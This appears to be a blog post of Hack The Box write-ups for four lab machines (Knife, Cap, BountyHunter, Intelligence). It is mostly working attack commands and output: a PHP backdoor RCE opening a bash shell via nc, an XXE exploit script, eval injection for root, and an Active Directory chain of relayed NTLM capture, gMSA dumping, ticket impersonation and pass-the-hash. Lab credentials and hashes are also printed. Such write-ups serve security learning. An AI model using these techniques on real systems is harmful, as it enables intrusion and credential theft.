xXxYOLOxXx

xXxYOLOxXx

HTB_Set_2

Posted on Edited on In

随缘更新

Knife

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -Pn -T5 10.10.10.242

Nmap scan report for 10.10.10.242
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

得到PHP版本信息

1
2
3
4
5
6
7
curl -I http://10.10.10.242/

HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 05:54:34 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

查询得到相关漏洞

1
2
3
4
5
6
7
8
9
searchsploit php 8.1 dev

----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution        | php/webapps/49933.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

将Bash开放到目标服务器9876端口,并用nc连接

1
curl -H "User-Agentt: zerodiumsystem('mkfifo /tmp/bufferfly; cat /tmp/bufferfly | /bin/bash -i 2>&1 | nc -l 9876 > /tmp/bufferfly');" http://10.10.10.242/
1
2
3
4
nc 10.10.10.242 9876
cat /home/james/user.txt

71a8b414816d223319c095a64edbae6c

权限提升

查看sudo权限

1
2
3
4
5
6
7
sudo -l

Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
1
2
3
4
sudo -u root knife exec --exec "exec '/bin/bash -i'"
cat /root/root.txt

6fa9527622b5b0396511a575bd529b42

Cap

端口扫描

1
2
3
4
5
6
7
8
9
10
nmap -sV -Pn -T5 10.10.10.245

Nmap scan report for 10.10.10.245
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

下载流量包

1
2
curl -O http://10.10.10.245/download/0
wireshark 0

得到FTP登入凭证

1
nathan:Buck3tH4TF0RM3!
1
2
ssh nathan@10.10.10.245
Buck3tH4TF0RM3!
1
2
3
cat /home/nathan/user.txt

f514ef062a27e672c5e88001061d8c5a

权限提升

查看capability

1
2
3
4
5
6
7
getcap /* -r 2>/dev/null

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

使用python进行提权

1
2
3
4
/usr/bin/python3.8 -c 'import os;os.setuid(0);os.system("/bin/bash")'
cat /root/root.txt

64941cc0edb38d723f72d34453780c90

BountyHunter

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -Pn -T5  10.10.11.100

Nmap scan report for 10.10.11.100
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

1
2
3
dirb http://10.10.11.100/ -X .php

+ http://10.10.11.100/db.php (CODE:200|SIZE:0)

漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import base64
import re
import requests

req = requests.session()
file = input()
payload = {"data":base64.b64encode(("""<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=""" + file + """\">]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>2</cwe>
        <cvss>3</cvss>
        <reward>4</reward>
        </bugreport>""").encode()).decode()}
url = "http://10.10.11.100/tracker_diRbPr00f314.php"
res=req.post(url=url, data=payload)
data = res.text
data = data.replace("\n", "")
result = base64.b64decode(re.findall("<td>Title:</td>    <td>(.*?)</td>", data)[0].encode()).decode()
print(result)

读取/etc/passwd

1
development:x:1000:1000:Development:/home/development:/bin/bash

读取db.php

1
2
3
4
5
6
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";

登入SSH服务

1
2
ssh development@10.10.11.100
m19RoAU0hP41A1sTsq6K
1
2
3
cat /home/development/user.txt

96248cc10e05f03e3b63eb59adfd9d4c

权限提升

1
2
3
4
5
6
7
8
9
10
11
cat /home/development/contract.txt

Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.

This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.

I set up the permissions for you to test this. Good luck.

-- John

查看sudo权限

1
2
3
4
5
6
7
8
sudo -l

Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

查看py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

eval()可以进行执行命令

构造恶意文本

1
2
3
4
5
6
7
8
cat /tmp/1.md

# Skytrain Inc
## Ticket to Bridgeport
__Ticket Code:__
**11+eval("__import__('os').system('/bin/bash')")**
##Issued: 2021/06/21
#End Ticket

提权

1
2
sudo -u root /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
/tmp/1.md
1
2
3
cat /root/root.txt

d8b513ba7130a46641d2c65966f6b8e6

Intelligence

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sV -sT -Pn 10.10.10.248

Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-18 12:54:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

访问80端口,可以看到主页上有两个PDF的链接

尝试枚举其他PDF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#pdf.py
import requests
req = requests.session()
for i in range(3):
    for j in range(1, 13):
        for k in range(31):
            year = str(2020 + i)
            month = ("0" + str(j)) if len(str(j)) == 1 else str(j)
            day = ("0" + str(k)) if len(str(k)) == 1 else str(k)
            url = "http://10.10.10.248/documents/" + year + "-" + month + "-" + day + "-upload.pdf"
            res = req.get(url)
            if res.status_code == 200:
                filename = year + "-" + month + "-" + day + "-upload.pdf"
                print(filename)
                file = open(filename, "wb")
                file.write(res.content)

获取PDF的用户名

1
2
3
4
5
6
7
8
#pdf.sh
filelist=`ls *.pdf`
filenum=`ls *.pdf|wc -l`
for ((i=1;i<=$filenum;i++))
do
    filename[${i}]=`ls *.pdf| sed -n ${i}p`
    echo `exiftool ${filename[${i}]} | grep Creator | awk -F \  '{print \$3}'` >> user
done

从2020-06-04-upload.pdf中得到一个密码NewIntelligenceCorpUser9876

爆破SMB

1
2
3
crackmapexec smb 10.10.10.248 -d intelligence -u user -p NewIntelligenceCorpUser9876

SMB         10.10.10.248    445    DC               [+] intelligence\Tiffany.Molina:NewIntelligenceCorpUser9876

查看SMB路径

1
2
3
4
5
6
7
8
9
10
11
smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence

    Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                READ ONLY   Remote IPC
    IT                                                  READ ONLY   
    NETLOGON                                            READ ONLY   Logon server share 
    SYSVOL                                              READ ONLY   Logon server share 
    Users                                               READ ONLY

获得user.txt

1
2
3
smbclient //10.10.10.248/users -U Tiffany.Molina NewIntelligenceCorpUser9876
cd Tiffany.Molina\Desktop\
get user.txt
1
2
3
cat user.txt

bbfd0948d53d769c6ec2fcc02181fa7b

权限提升

获取powershell脚本

1
2
smbclient //10.10.10.248/IT -U Tiffany.Molina NewIntelligenceCorpUser9876
get downdetector.ps1
1
2
3
4
5
6
7
8
9
10
11
12
cat downdetector.ps1

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

伪造域名

1
2
wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/dnstool.py
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 --action add -r webbufferfly.intelligence.htb -d 10.10.16.24 10.10.10.248

获取账户

1
2
3
responder -I tun0 -A

Ted.Graves::intelligence:a0ccbece497d44d6:5F06EFF458D65EF3D277BBEF99522C05:01010000000000006E002FBCEB7ED70155A10145AE3210F90000000002000800320041004400530001001E00570049004E002D00490056004200580046004E00320037003300340045000400140032004100440053002E004C004F00430041004C0003003400570049004E002D00490056004200580046004E00320037003300340045002E0032004100440053002E004C004F00430041004C000500140032004100440053002E004C004F00430041004C000800300030000000000000000000000000200000A9E570CA9FC3E890033A04EB61C9D3A383AF9C961FCC3E1B59979F2C02378B410A0010000000000000000000000000000000000009003E0048005400540050002F007700650062003100310034003500310034002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

爆破Hash

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Mr.Teddy         (Ted.Graves)

获得凭证

1
Ted.Graves:Mr.Teddy

获取Hash

1
2
3
4
wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248

svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7

获取SPN

1
2
3
4
git clone https://github.com/the-useless-one/pywerview
python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data

msds-allowedtodelegateto:       WWW/dc.intelligence.htb

获取ST

1
2
3
4
5
python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k dc.intelligence.htb -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::

Hash登入

1
2
3
4
evil-winrm -i 10.10.10.248 -u administrator -H 9075113fe16cf74f7c0f9b27e882dad3
type c:\users\administrator\desktop\root.txt

0c6b9779d283e244e79b11c78fc1fb92